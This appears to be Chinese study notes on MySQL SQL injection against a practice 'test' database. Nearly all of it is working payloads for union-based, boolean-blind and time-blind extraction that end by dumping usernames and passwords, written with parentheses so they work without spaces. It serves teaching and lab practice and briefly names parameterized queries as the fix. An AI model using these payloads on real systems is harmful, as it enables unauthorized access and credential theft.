数据库结构
数据库内容
1.报错注入(注:以下语句实际使用的是 union 联合查询注入,并未用到报错函数)
判断注入点(两条语句的返回结果不同,说明输入被直接拼接进了 SQL 语句;根本修复方式是改用参数化查询)
admin'and(1=1)#
admin'and(1=2)#
确定列数
admin'union(select(1),(2),(3))#
查询user
admin'union(select(1),(user()),(3))#
查询数据库名
admin'union(select(1),(database()),(3))#
查询表名(0x74657374 是库名 test 的十六进制写法)
admin'union(select(table_name),(2),(3)from(information_schema.tables)where(table_schema=0x74657374))#
查询列名(0x75736572 是表名 user 的十六进制写法)
admin'union((select(column_name),(2),(3)from(information_schema.columns)where(table_schema=0x74657374)and(table_name=0x75736572)))#
查询数据
admin'union(select(username),(password),(3)from(user))#
2.布尔盲注(页面不回显数据,只能根据返回结果的真/假差异逐位判断)
确定列数
admin'union(select(1),(2),(3))#
确定数据库名长度
admin'and(length(database())=4)#
获取数据库名的第一个字符(ASCII 116 即 't'),其余字符以此类推
admin'and(ascii(mid(database(),1,1))=116)#
获取表名
admin'and(select(ascii(mid(group_concat(table_name),1,1))=116)from(information_schema.columns)where(table_schema=0x74657374))#
获取字段名
admin'and(select(ascii(mid(group_concat(column_name),1,1))=73)from(information_schema.columns)where(table_schema=0x74657374)and(table_name=0x75736572))#
获取数据
admin'and(select(ascii(mid(group_concat(username),1,1))=97)from(user))#
3.时间盲注(页面无任何差异时,根据响应是否延迟来判断条件真假)
获取数据库名称
admin'and(if((ascii(mid(database(),1,1))=116),sleep(5),0))#
获取表名
admin'and(if((select(ascii(mid(group_concat(table_name),1,1))=116)from(information_schema.columns)where(table_schema=0x74657374)),sleep(5),0))#
获取字段名
admin'and(if((select(ascii(mid(group_concat(column_name),1,1))=73)from(information_schema.columns)where(table_schema=0x74657374)and(table_name=0x75736572)),sleep(5),0))#
获取数据
admin'and(if((select(ascii(mid(group_concat(username),1,1))=97)from(user)),sleep(5),1))#